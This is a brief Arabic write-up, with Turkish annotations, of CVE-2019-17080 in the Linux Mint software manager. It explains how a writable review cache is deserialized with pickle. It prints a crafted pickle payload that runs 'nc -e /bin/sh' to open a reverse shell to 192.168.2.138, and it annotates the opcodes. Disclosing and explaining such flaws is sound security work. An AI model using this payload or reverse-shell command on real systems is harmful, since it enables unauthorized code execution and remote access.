
CVE-2019-17080
يؤدي مدير برمجيات لينكس مينت (الإصدار 7.9.5/9) إلى تنفيذ حقن كائنات ورمز تعسفي بسبب إعدادات غير صحيحة.
mintinsall
عند تشغيل مدير برمجيات Mint، يتحقق من وجود تعليقات جديدة، وإذا وُجدت تعليقات جديدة، يقوم بالتنزيل من new-reviews.list وكتابتها إلى ملف.

code mintinstall.py
عند بدء تشغيل مدير البرمجيات لأول مرة، يستدعي الفئة ReviewCache() من وحدة reviews.

code reviews.py
عند بدء الفئة ReviewCache (في init) تستدعي الدالة _load_cache().

تقرأ دالة تحميل الكاش الملف الموجود في المتغير REVIEWS_CACHE وتقوم بإلغاء تسلسل البيانات الموجودة في الملف بمساعدة وحدة pickle وتحتفظ ببعض القيم في الذاكرة.

عندما فحصت الملف، يبدو أن لدي إذن الكتابة.

نظرًا لأنه يمكننا تنفيذ عمليات التسلسل وإلغاء التسلسل بمساعدة وحدة Pickle، يمكننا تضمين الوحدة وتنفيذ رمز تعسفي باستخدام طريقة reduce.

في هذه الحالة، إذا تمت محاولة إلغاء تسلسل الملف، فسيتم تشغيل الكود الخبيث لدينا.
cos
system
(S'nc -e /bin/sh 192.168.2.138 4545'
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.

